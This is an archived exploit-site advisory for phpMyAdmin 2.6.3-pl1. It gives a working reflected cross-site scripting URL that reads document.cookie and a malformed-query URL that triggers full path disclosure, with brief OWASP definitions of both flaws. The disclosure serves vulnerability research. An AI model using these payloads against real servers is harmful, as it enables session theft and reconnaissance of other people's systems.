phpMyAdmin 2.6.3-pl1 Cross Site Scripting and Full Path
Posted on 18 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>phpMyAdmin 2.6.3-pl1 Cross Site Scripting and Full Path</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================================= phpMyAdmin 2.6.3-pl1 Cross Site Scripting and Full Path ======================================================= # Exploit Title: phpMyAdmin 2.6.3-pl1 Cross Site Scripting and Full Path Disclosure. # Author: cp77fk4r | empty0page[SHIFT+2]gmail.com | www.DigitalWhisper.co.il # Software Link: www.phpmyadmin.net | http://www.phpmyadmin.net/home_page/downloads.php # Version: 2.6.3-pl1 # Tested on: PHP # ##[Cross Site Scripting]* (Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it) http:// [server]/phpmyadmin/left.php?lang=he-iso-8859-8-i&server=1&hash=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E # # ##[FULL PATH DICSLOSURE]** (Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. e.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL Injection) query to view the page source, require the attacker to have the full path to the file they wish to view. (OWASP)) # http:// [server]/phpmyadmin/sql.php?lang=he-iso-8859-8-i&server=1&db=x&table=x&sql_query=1' # Will returne: # Fatal error: Cannot use string offset as an array in [FPD] on line 901 # # *The victim must be logged in. **The attacker must be logged in. # # [e0f] # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
